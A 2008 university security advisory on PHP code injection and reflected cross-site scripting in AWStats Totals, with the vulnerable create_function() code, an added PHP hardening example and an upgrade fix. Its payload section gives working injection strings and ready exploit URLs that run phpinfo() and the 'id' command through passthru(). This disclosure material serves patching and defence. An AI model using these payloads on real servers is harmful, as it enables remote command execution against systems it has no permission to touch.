Emory University UTS Security Advisory EMORY-2008-01
Topic: Multiple Vulnerabilities in AWStats Totals
Original release date: August 26, 2008
SUMMARY
=======
Telartis's AWStats Totals program is vulnerable to PHP code injection
(leading to arbitrary command execution) and to cross-site scripting.
A remote, unauthenticated attacker could exploit the injection to run
arbitrary commands on the system with the permissions of the web server.
AFFECTED SOFTWARE
=================
* AWStats Totals 1.0 - 1.14
UNAFFECTED
==========
* AWStats Totals >= 1.15
IMPACT
======
A remote attacker could exploit these vulnerabilities to run arbitrary
commands on the web server's host operating system.
DETAILS
=======
AWStats Totals takes three URL parameters, "month," "year," and
"sort," and uses them without checking them for validity.
The program echoes the month and year parameters into the page it
returns without encoding them. Any HTML or JavaScript included in these
parameters is therefore rendered by the user's browser (reflected
cross-site scripting).
The program uses the sort parameter to build an anonymous PHP function
with the create_function() function.
> function multisort(&$array, $key) {
>     $cmp = create_function('$a, $b',
>         'if ($a["'.$key.'"] == $b["'.$key.'"]) return 0;'.
>         'return ($a["'.$key.'"] > $b["'.$key.'"]) ? -1 : 1;');
>     usort($array, $cmp);
> }
>
> if ($sort == 'config') sort($rows); else multisort($rows, $sort);
The sort value is concatenated directly into the source string passed to
create_function(). Taking care to balance the surrounding double quotes
and square brackets of $a["..."], it is possible to insert arbitrary PHP
expressions into the generated function. For example, to run the
phpinfo() function, one might set sort to this value:
"].phpinfo().$a["
Since the generated comparator, and with it any injected code, runs once
per comparison made by usort(), it may be useful to exit the program
after a single invocation:
"].phpinfo().exit().$a["
It is also possible to insert PHP expressions without using any quote
characters, through the {${...}} variable-variable syntax that newer
versions of PHP evaluate inside double-quoted strings:
{${phpinfo()}}{${exit()}}
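The following PHP is an added example for this advisory; it is not code from the advisory or from AWStats Totals. The first function reproduces the string construction of the quoted multisort() so the generated comparator source for each payload can be inspected without executing it. The second is a hardened multisort() that checks the key against a whitelist and compares with a closure, so the key is only ever used as data. The column names in the whitelist, the function names, and the month/year validator are assumptions for illustration; the real allowed keys must come from the application's own row structure.

```php
<?php
// Added example, not code from the advisory or from AWStats Totals.
// Part 1: render the comparator source the original multisort() builds
// for a given "sort" value. Part 2: a hardened multisort() and a
// validator for the reflected month/year parameters.

// Reproduces the string construction from the quoted multisort() so the
// generated PHP can be read without being passed to create_function().
function render_comparator_source($key) {
    return 'if ($a["' . $key . '"] == $b["' . $key . '"]) return 0;'
         . 'return ($a["' . $key . '"] > $b["' . $key . '"]) ? -1 : 1;';
}

// Hardened replacement. The column names below are an assumption; take
// the real list from the application's row structure. The closure needs
// PHP 5.3+, and replaces create_function(), which is deprecated since
// PHP 7.2 and removed in PHP 8.0.
function multisort_safe(array &$rows, $key) {
    $allowed = array('unique', 'visits', 'pages', 'hits', 'bandwidth');
    if (!in_array($key, $allowed, true)) {
        throw new InvalidArgumentException('unsupported sort key');
    }
    usort($rows, function ($a, $b) use ($key) {
        if ($a[$key] == $b[$key]) return 0;
        return ($a[$key] > $b[$key]) ? -1 : 1;
    });
}

// month and year are echoed into HTML by the original. Accepting only
// integers in range removes the XSS vector no matter how they are printed.
function validate_month_year($month, $year) {
    $m = (string)$month;
    if (!preg_match('/^\d{1,2}$/', $m) || (int)$m < 1 || (int)$m > 12) {
        throw new InvalidArgumentException('invalid month');
    }
    if (!preg_match('/^\d{4}$/', (string)$year)) {
        throw new InvalidArgumentException('invalid year');
    }
    return array((int)$m, (int)$year);
}

// Constructed input: the two payloads given in the advisory.
foreach (array('"].phpinfo().$a["', '{${phpinfo()}}{${exit()}}') as $payload) {
    echo "sort=$payload\n  generated: ", render_comparator_source($payload), "\n";
}

// Constructed sample rows for the hardened sort.
$rows = array(
    array('config' => 'site-a', 'hits' => 5),
    array('config' => 'site-b', 'hits' => 9),
);
multisort_safe($rows, 'hits');
echo "first row after sorting by hits: ", $rows[0]['config'], "\n";

// Both an injection payload and an unknown column are rejected up front.
foreach (array('"].phpinfo().$a["', 'nosuchcolumn') as $bad) {
    try {
        multisort_safe($rows, $bad);
    } catch (InvalidArgumentException $e) {
        echo "rejected sort value: ", $e->getMessage(), "\n";
    }
}

try {
    validate_month_year('<script>alert(1)</script>', '2008');
} catch (InvalidArgumentException $e) {
    echo "rejected month: ", $e->getMessage(), "\n";
}
```

Running the first loop shows why the payloads work: the first one closes the `$a["` index and resumes it, yielding `$a[""].phpinfo().$a[""]`, while the second leaves the string intact and relies on PHP interpolating `{${phpinfo()}}` when the generated code runs. The whitelist check is the actual fix; the closure is only there so the fix does not depend on create_function().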
SOLUTION
========
Upgrade to AWStats Totals 1.15.
http://www.telartis.nl/xcms/awstats/
EXPLOIT
=======
The following examples require that magic quotes be disabled (the
payload contains double quotes, which magic_quotes_gpc would escape),
but they work on any PHP version that provides create_function(),
i.e. PHP 4.0.1 through 7.x; the function was removed in PHP 8.0.
This example will display phpinfo().
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
This example will run the "id" command on the target system.
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
======
The following examples require a PHP version that evaluates function
calls inside the {${...}} string syntax (PHP 5 and later; support in
PHP 4 is uncertain), but they contain no quote characters and so work
even when magic quotes are enabled.
This example will display phpinfo().
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
This example will run the "id" command on the target system;
chr(105).chr(100) builds the string "id" without using quote characters.
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
ACKNOWLEDGMENTS
===============
Thanks to Telartis B.V. and Jeroen de Jong for quickly releasing an
updated version and for assisting with this advisory.
DISCLAIMER
==========
The information in this advisory is provided by Emory as a courtesy
and without any representations or warranties. Recipients are
advised to conduct their own investigation and due diligence before
relying on its contents.
REVISION HISTORY
================
2008-08-26 original release